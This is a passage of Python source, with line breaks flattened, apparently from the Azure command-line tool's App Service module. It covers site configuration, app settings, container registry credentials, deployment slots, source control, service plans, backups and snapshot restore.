CLIError("Cannot decode config that is not one of the" " following types: {}".format(','.join(MULTI_CONTAINER_TYPES))) return b64decode(linux_fx_version.split('|')[1].encode('utf-8')) def _get_linux_multicontainer_encoded_config_from_file(file_name): from base64 import b64encode config_file_bytes = None if url_validator(file_name): response = urlopen(file_name, context=_ssl_context()) config_file_bytes = response.read() else: with open(file_name, 'rb') as f: config_file_bytes = f.read() # Decode base64 encoded byte array into string return b64encode(config_file_bytes).decode('utf-8') # for any modifications to the non-optional parameters, adjust the reflection logic accordingly # in the method # pylint: disable=unused-argument def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None, windows_fx_version=None, pre_warmed_instance_count=None, php_version=None, python_version=None, net_framework_version=None, java_version=None, java_container=None, java_container_version=None, remote_debugging_enabled=None, web_sockets_enabled=None, always_on=None, auto_heal_enabled=None, use32_bit_worker_process=None, min_tls_version=None, http20_enabled=None, app_command_line=None, ftps_state=None, vnet_route_all_enabled=None, generic_configurations=None): configs = get_site_configs(cmd, resource_group_name, name, slot) if number_of_workers is not None: number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20) if linux_fx_version: if linux_fx_version.strip().lower().startswith('docker|'): update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"]) else: delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"]) if pre_warmed_instance_count is not None: pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count, min_val=0, max_val=20) import inspect frame = inspect.currentframe() bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on', 'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled', 'vnet_route_all_enabled'] int_flags = ['pre_warmed_instance_count', 'number_of_workers'] # note: getargvalues is used already in azure.cli.core.commands. # and no simple functional replacement for this deprecating method for 3.5 args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method for arg in args[3:]: if arg in int_flags and values[arg] is not None: values[arg] = validate_and_convert_to_int(arg, values[arg]) if arg != 'generic_configurations' and values.get(arg, None): setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true') generic_configurations = generic_configurations or [] # https://github.com/Azure/azure-cli/issues/14857 updating_ip_security_restrictions = False result = {} for s in generic_configurations: try: json_object = get_json_object(s) for config_name in json_object: if config_name.lower() == 'ip_security_restrictions': updating_ip_security_restrictions = True result.update(json_object) except CLIError: config_name, value = s.split('=', 1) result[config_name] = value for config_name, value in result.items(): if config_name.lower() == 'ip_security_restrictions': updating_ip_security_restrictions = True setattr(configs, config_name, value) if not updating_ip_security_restrictions: setattr(configs, 'ip_security_restrictions', None) setattr(configs, 'scm_ip_security_restrictions', None) return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs) def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None): app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot) client = web_client_factory(cmd.cli_ctx) slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) is_slot_settings = False for setting_name in setting_names: app_settings.properties.pop(setting_name, None) if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names: slot_cfg_names.app_setting_names.remove(setting_name) is_slot_settings = True if is_slot_settings: client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_application_settings', app_settings, slot, client) return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names) def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None): azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_azure_storage_accounts', slot) client = web_client_factory(cmd.cli_ctx) slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) is_slot_settings = False azure_storage_accounts.properties.pop(custom_id, None) if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names: slot_cfg_names.azure_storage_config_names.remove(custom_id) is_slot_settings = True if is_slot_settings: client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_azure_storage_accounts', azure_storage_accounts, slot, client) return result.properties def _ssl_context(): if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'): try: return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6 except AttributeError: return ssl.SSLContext(ssl.PROTOCOL_TLSv1) return ssl.create_default_context() def _build_app_settings_output(app_settings, slot_cfg_names): slot_cfg_names = slot_cfg_names or [] return [{'name': p, 'value': app_settings[p], 'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)] def update_connection_strings(cmd, resource_group_name, name, connection_string_type, settings=None, slot=None, slot_settings=None): from azure.mgmt.web.models import ConnStringValueTypePair if not settings and not slot_settings: raise CLIError('Usage Error: --settings |--slot-settings') settings = settings or [] slot_settings = slot_settings or [] conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot) for name_value in settings + slot_settings: # split at the first '=', connection string should not have '=' in the name conn_string_name, value = name_value.split('=', 1) if value[0] in ["'", '"']: # strip away the quots used as separators value = value[1:-1] conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value, type=connection_string_type) client = web_client_factory(cmd.cli_ctx) result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_connection_strings', conn_strings, slot, client) if slot_settings: new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings] slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or [] slot_cfg_names.connection_string_names += new_slot_setting_names client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) return result.properties def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None): conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot) client = web_client_factory(cmd.cli_ctx) slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) is_slot_settings = False for setting_name in setting_names: conn_strings.properties.pop(setting_name, None) if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names: slot_cfg_names.connection_string_names.remove(setting_name) is_slot_settings = True if is_slot_settings: client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_connection_strings', conn_strings, slot, client) CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME', 'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"] APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD'] def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None, docker_custom_image_name=None, docker_registry_server_user=None, websites_enable_app_service_storage=None, docker_registry_server_password=None, multicontainer_config_type=None, multicontainer_config_file=None, slot=None): settings = [] if docker_registry_server_url is not None: settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url) if (not docker_registry_server_user and not docker_registry_server_password and docker_registry_server_url and '.azurecr.io' in docker_registry_server_url): logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...') parsed = urlparse(docker_registry_server_url) registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0] try: docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name) except Exception as ex: # pylint: disable=broad-except logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed if docker_registry_server_user is not None: settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user) if docker_registry_server_password is not None: settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password) if websites_enable_app_service_storage: settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage) if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long update_app_settings(cmd, resource_group_name, name, settings, slot) settings = get_app_settings(cmd, resource_group_name, name, slot) if docker_custom_image_name is not None: _add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot) if multicontainer_config_file and multicontainer_config_type: encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file) linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type) update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot) elif multicontainer_config_file or multicontainer_config_type: logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE') return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings, slot=slot)) def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None, docker_custom_image_name=None, docker_registry_server_user=None, docker_registry_server_password=None, slot=None): return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url, docker_custom_image_name, docker_registry_server_user, None, docker_registry_server_password, multicontainer_config_type=None, multicontainer_config_file=None, slot=slot) def _get_acr_cred(cli_ctx, registry_name): from azure.mgmt.containerregistry import ContainerRegistryManagementClient from azure.cli.core.commands.parameters import get_resources_in_subscription client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries') result = [item for item in result if item.name.lower() == registry_name] if not result or len(result) > 1: raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name)) resource_group_name = parse_resource_id(result[0].id)['resource_group'] registry = client.get(resource_group_name, registry_name) if registry.admin_user_enabled: # pylint: disable=no-member cred = client.list_credentials(resource_group_name, registry_name) return cred.username, cred.passwords[0].value raise CLIError("Failed to retrieve container registry credentials. Please either provide the " "credentials or run 'az acr update -n {} --admin-enabled true' to enable " "admin first.".format(registry_name)) def delete_container_settings(cmd, resource_group_name, name, slot=None): _delete_linux_fx_version(cmd, resource_group_name, name, slot) delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot) def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None): settings = get_app_settings(cmd, resource_group_name, name, slot) return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings, show_multicontainer_config, slot)) def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None): return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot) def _filter_for_container_settings(cmd, resource_group_name, name, settings, show_multicontainer_config=None, slot=None): result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES] fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip() if fx_version: added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME', 'value': fx_version} result.append(added_image_name) if show_multicontainer_config: decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot) decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED', 'value': decoded_value} result.append(decoded_image_name) return result # TODO: remove this when #3660(service tracking issue) is resolved def _mask_creds_related_appsettings(settings): for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]: settings[x] = None return settings def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None): from azure.mgmt.web.models import HostNameBinding client = web_client_factory(cmd.cli_ctx) webapp = client.web_apps.get(resource_group_name, webapp_name) if not webapp: raise CLIError("'{}' app doesn't exist".format(webapp_name)) binding = HostNameBinding(site_name=webapp.name) if slot is None: return client.web_apps.create_or_update_host_name_binding(resource_group_name=resource_group_name, name=webapp.name, host_name=hostname, host_name_binding=binding) return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name=resource_group_name, name=webapp.name, host_name=hostname, slot=slot, host_name_binding=binding) def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None): client = web_client_factory(cmd.cli_ctx) if slot is None: return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname) return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname) def list_hostnames(cmd, resource_group_name, webapp_name, slot=None): result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_host_name_bindings', slot)) for r in result: r.name = r.name.split('/')[-1] return result def get_external_ip(cmd, resource_group_name, webapp_name): SslState = cmd.get_models('SslState') # logics here are ported from portal client = web_client_factory(cmd.cli_ctx) webapp = client.web_apps.get(resource_group_name, webapp_name) if not webapp: raise CLIError("'{}' app doesn't exist".format(webapp_name)) if webapp.hosting_environment_profile: address = client.app_service_environments.list_vips( resource_group_name, webapp.hosting_environment_profile.name) if address.internal_ip_address: ip_address = address.internal_ip_address else: vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None) ip_address = vip.virtual_ip if vip else address.service_ip_address else: ip_address = _resolve_hostname_through_dns(webapp.default_host_name) return {'ip': ip_address} def _resolve_hostname_through_dns(hostname): import socket return socket.gethostbyname(hostname) def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None): Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair') client = web_client_factory(cmd.cli_ctx) site = client.web_apps.get(resource_group_name, webapp) site_config = get_site_configs(cmd, resource_group_name, webapp, None) if not site: raise CLIError("'{}' app doesn't exist".format(webapp)) if 'functionapp' in site.kind: raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp)) location = site.location slot_def = Site(server_farm_id=site.server_farm_id, location=location) slot_def.site_config = SiteConfig() # if it is a Windows Container site, at least pass the necessary # app settings to perform the container image validation: if configuration_source and site_config.windows_fx_version: # get settings from the source clone_from_prod = configuration_source.lower() == webapp.lower() src_slot = None if clone_from_prod else configuration_source app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'list_application_settings', src_slot) settings = [] for k, v in app_settings.properties.items(): if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD", "DOCKER_REGISTRY_SERVER_URL"): settings.append(NameValuePair(name=k, value=v)) slot_def.site_config = SiteConfig(app_settings=settings) poller = client.web_apps.begin_create_or_update_slot(resource_group_name, webapp, site_envelope=slot_def, slot=slot) result = LongRunningOperation(cmd.cli_ctx)(poller) if configuration_source: update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source) result.name = result.name.split('/')[-1] return result def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None): Site = cmd.get_models('Site') client = web_client_factory(cmd.cli_ctx) site = client.web_apps.get(resource_group_name, name) if not site: raise CLIError("'{}' function app doesn't exist".format(name)) location = site.location slot_def = Site(server_farm_id=site.server_farm_id, location=location) poller = client.web_apps.begin_create_or_update_slot(resource_group_name, name, site_envelope=slot_def, slot=slot) result = LongRunningOperation(cmd.cli_ctx)(poller) if configuration_source: update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source) result.name = result.name.split('/')[-1] return result def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None): clone_from_prod = configuration_source.lower() == webapp.lower() site_config = get_site_configs(cmd, resource_group_name, webapp, None if clone_from_prod else configuration_source) _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_configuration', slot, site_config) # slot create doesn't clone over the app-settings and connection-strings, so we do it here # also make sure slot settings don't get propagated. slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp) src_slot = None if clone_from_prod else configuration_source app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'list_application_settings', src_slot) for a in slot_cfg_names.app_setting_names or []: app_settings.properties.pop(a, None) connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'list_connection_strings', src_slot) for a in slot_cfg_names.connection_string_names or []: connection_strings.properties.pop(a, None) _generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_application_settings', app_settings, slot, client) _generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_connection_strings', connection_strings, slot, client) def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals manual_integration=None, git_token=None, slot=None, github_action=None): client = web_client_factory(cmd.cli_ctx) location = _get_location_from_webapp(client, resource_group_name, name) from azure.mgmt.web.models import SiteSourceControl, SourceControl if git_token: sc = SourceControl(location=location, source_control_name='GitHub', token=git_token) client.update_source_control('GitHub', sc) source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch, is_manual_integration=manual_integration, is_mercurial=(repository_type != 'git'), is_git_hub_action=bool(github_action)) # SCC config can fail if previous commands caused SCMSite shutdown, so retry here. for i in range(5): try: poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update_source_control', slot, source_control) return LongRunningOperation(cmd.cli_ctx)(poller) except Exception as ex: # pylint: disable=broad-except import re ex = ex_handler_factory(no_throw=True)(ex) # for non server errors(50x), just throw; otherwise retry 4 times if i == 4 or not re.findall(r'\(50\d\)', str(ex)): raise logger.warning('retrying %s/4', i + 1) time.sleep(5) # retry in a moment def update_git_token(cmd, git_token=None): ''' Update source control token cached in Azure app service. If no token is provided, the command will clean up existing token. ''' client = web_client_factory(cmd.cli_ctx) from azure.mgmt.web.models import SourceControl sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '') return client.update_source_control('GitHub', sc) def show_source_control(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot) def delete_source_control(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot) def enable_local_git(cmd, resource_group_name, name, slot=None): client = web_client_factory(cmd.cli_ctx) site_config = get_site_configs(cmd, resource_group_name, name, slot) site_config.scm_type = 'LocalGit' _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update_configuration', slot, site_config) return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)} def sync_site_repo(cmd, resource_group_name, name, slot=None): try: return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot) except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here if ex.status_code not in [200, 204]: raise ex def list_app_service_plans(cmd, resource_group_name=None): client = web_client_factory(cmd.cli_ctx) if resource_group_name is None: plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites" else: plans = list(client.app_service_plans.list_by_resource_group(resource_group_name)) for plan in plans: # prune a few useless fields del plan.geo_region del plan.subscription return plans def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False, app_service_environment=None, sku='B1', number_of_workers=None, location=None, tags=None, no_wait=False, zone_redundant=False): HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models( 'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan') client = web_client_factory(cmd.cli_ctx) if app_service_environment: if hyper_v: raise ArgumentUsageError('Windows containers is not yet supported in app service environment') ase_list = client.app_service_environments.list() ase_found = False ase = None for ase in ase_list: if ase.name.lower() == app_service_environment.lower() or ase.id.lower() == app_service_environment.lower(): ase_def = HostingEnvironmentProfile(id=ase.id) location = ase.location ase_found = True break if not ase_found: err_msg = "App service environment '{}' not found in subscription.".format(app_service_environment) raise ResourceNotFoundError(err_msg) else: # Non-ASE ase_def = None if location is None: location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name) # the api is odd on parameter naming, have to live with it for now sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers) plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def, reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name, per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def) # TODO use zone_redundant field on ASP model when we switch to SDK version 5.0.0 if zone_redundant: plan_def.enable_additional_properties_sending() existing_properties = plan_def.serialize()["properties"] plan_def.additional_properties["properties"] = existing_properties plan_def.additional_properties["properties"]["zoneRedundant"] = True if number_of_workers is None: sku_def.capacity = 3 else: sku_def.capacity = max(3, number_of_workers) return sdk_no_wait(no_wait, client.app_service_plans.begin_create_or_update, name=name, resource_group_name=resource_group_name, app_service_plan=plan_def) def update_app_service_plan(instance, sku=None, number_of_workers=None): if number_of_workers is None and sku is None: logger.warning('No update is done. Specify --sku and/or --number-of-workers.') sku_def = instance.sku if sku is not None: sku = _normalize_sku(sku) sku_def.tier = get_sku_name(sku) sku_def.name = sku if number_of_workers is not None: sku_def.capacity = number_of_workers instance.sku = sku_def return instance def show_plan(cmd, resource_group_name, name): from azure.cli.core.commands.client_factory import get_subscription_id client = web_client_factory(cmd.cli_ctx) serverfarm_url_base = 'subscriptions/{}/resourceGroups/{}/providers/Microsoft.Web/serverfarms/{}?api-version={}' subscription_id = get_subscription_id(cmd.cli_ctx) serverfarm_url = serverfarm_url_base.format(subscription_id, resource_group_name, name, client.DEFAULT_API_VERSION) request_url = cmd.cli_ctx.cloud.endpoints.resource_manager + serverfarm_url response = send_raw_request(cmd.cli_ctx, "GET", request_url) return response.json() def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None): instance = update_app_service_plan(instance, sku, number_of_workers) if max_burst is not None: if not is_plan_elastic_premium(cmd, instance): raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans") max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20) instance.maximum_elastic_worker_count = max_burst if number_of_workers is not None: number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances', number_of_workers, min_val=0, max_val=20) return update_app_service_plan(instance, sku, number_of_workers) def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None): try: return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'get_backup_configuration', slot) except Exception: # pylint: disable=broad-except raise CLIError('Backup configuration not found') def list_backups(cmd, resource_group_name, webapp_name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups', slot) def create_backup(cmd, resource_group_name, webapp_name, storage_account_url, db_name=None, db_type=None, db_connection_string=None, backup_name=None, slot=None): BackupRequest = cmd.get_models('BackupRequest') client = web_client_factory(cmd.cli_ctx) if backup_name and backup_name.lower().endswith('.zip'): backup_name = backup_name[:-4] db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string) backup_request = BackupRequest(backup_name=backup_name, storage_account_url=storage_account_url, databases=db_setting) if slot: return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot) return client.web_apps.backup(resource_group_name, webapp_name, backup_request) def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None, frequency=None, keep_at_least_one_backup=None, retention_period_in_days=None, db_name=None, db_connection_string=None, db_type=None, backup_name=None, slot=None): BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest') configuration = None if backup_name and backup_name.lower().endswith('.zip'): backup_name = backup_name[:-4] if not backup_name: backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M')) try: configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'get_backup_configuration', slot) except Exception: # pylint: disable=broad-except # No configuration set yet if not all([storage_account_url, frequency, retention_period_in_days, keep_at_least_one_backup]): raise CLIError('No backup configuration found. A configuration must be created. ' + 'Usage: --container-url URL --frequency TIME --retention DAYS ' + '--retain-one TRUE/FALSE') # If arguments were not specified, use the values in the current backup schedule if storage_account_url is None: storage_account_url = configuration.storage_account_url if retention_period_in_days is None: retention_period_in_days = configuration.backup_schedule.retention_period_in_days if keep_at_least_one_backup is None: keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup else: keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true' if frequency: # Parse schedule frequency frequency_num, frequency_unit = _parse_frequency(cmd, frequency) else: frequency_num = configuration.backup_schedule.frequency_interval frequency_unit = configuration.backup_schedule.frequency_unit if configuration and configuration.databases: db = configuration.databases[0] db_type = db_type or db.database_type db_name = db_name or db.name db_connection_string = db_connection_string or db.connection_string db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string) backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name, keep_at_least_one_backup=keep_at_least_one_backup, retention_period_in_days=retention_period_in_days) backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule, enabled=True, storage_account_url=storage_account_url, databases=db_setting) return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration', slot, backup_request) def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name, db_name=None, db_type=None, db_connection_string=None, target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None): RestoreRequest = cmd.get_models('RestoreRequest') client = web_client_factory(cmd.cli_ctx) storage_blob_name = backup_name if not storage_blob_name.lower().endswith('.zip'): storage_blob_name += '.zip' db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string) restore_request = RestoreRequest(storage_account_url=storage_account_url, blob_name=storage_blob_name, overwrite=overwrite, site_name=target_name, databases=db_setting, ignore_conflicting_host_names=ignore_hostname_conflict) if slot: return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot) return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request) def list_snapshots(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots', slot) def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name source_resource_group=None, source_name=None, source_slot=None): from azure.cli.core.commands.client_factory import get_subscription_id SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest') client = web_client_factory(cmd.cli_ctx) recover_config = not restore_content_only if all([source_resource_group, source_name]): # Restore from source app to target app sub_id = get_subscription_id(cmd.cli_ctx) source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \ "/providers/Microsoft.Web/sites/" + source_name if source_slot: source_id = source_id + "/slots/" + source_slot source = SnapshotRecoverySource(id=source_id) request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source, recover_configuration=recover_config) if slot: return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot) return client.web_apps.restore_snapshot(resource_group_name, name, request) if any([source_resource_group, source_name]): raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used') # Overwrite app with its own snapshot request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config) if slot: return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot) return client.web_apps.restore_snapshot(resource_group_name, name, request) # pylint: disable=inconsistent-return-statements def _create_db_setting(cmd, db_name, db_type, db_connection_string): DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting') if all([db_name, db_type, db_connection_string]): return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)] if any([db_name, db_type, db_connection_string]): raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING') def _parse_frequency(cmd, frequency): FrequencyUnit = cmd.get_models('FrequencyUnit') unit_part = frequency.lower()[-1] if unit_part == 'd': frequency_unit = FrequencyUnit.day elif unit_part == 'h': frequency_unit = FrequencyUnit.hour else: raise CLIError('Frequency must end with d or h for "day" or "hour"') try: frequency_num = int(frequency[:-1]) except ValueError: raise CLIError('Frequency must start with a number') if frequency_num < 0: raise CLIError('Frequency must be positive') return frequency_num, frequency_unit def _get_deleted_apps_locations(cli_ctx): client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES) web_provider = client.providers.get('Microsoft.Web') del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None) if del_sites_resource: return del_sites_resource.locations return [] def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None): user = client.get_publishing_user() result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot) parsed = urlparse(result.repo_url) return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name, parsed.netloc, name) def _get_scm_url(cmd, resource_group_name, name, slot=None): from azure.mgmt.web.models import HostType app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot) for host in app.host_name_ssl_states or []: if host.host_type == HostType.repository: return "https://{}".format(host.name) # this should not happen, but throw anyway raise ValueError('Failed to retrieve Scm Uri') def get_publishing_user(cmd): client = web_client_factory(cmd.cli_ctx) return client.get_publishing_user() def set_deployment_user(cmd, user_name, password=None): ''' Update deployment credentials.(Note, all webapps in your subscription will be impacted) ''' User = cmd.get_models('User') client = web_client_factory(cmd.cli_ctx) user = User(publishing_user_name=user_name) if password is None: try: password = prompt_pass(msg='Password: ', confirm=True) except NoTTYException: raise CLIError('Please specify both username and password in non-interactive mode.') user.publishing_password = password return client.update_publishing_user(user) def list_publishing_credentials(cmd, resource_group_name, name, slot=None): content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_list_publishing_credentials', slot) return content.result() def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False): import xmltodict content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_publishing_profile_xml_with_secrets', slot, {"format": "WebDeploy"}) full_xml = '' for f in content: full_xml += f.decode() if not xml: profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile'] converted = [] if not isinstance(profiles, list): profiles = [profiles] for profile in profiles: new = {} for key in profile: # strip the 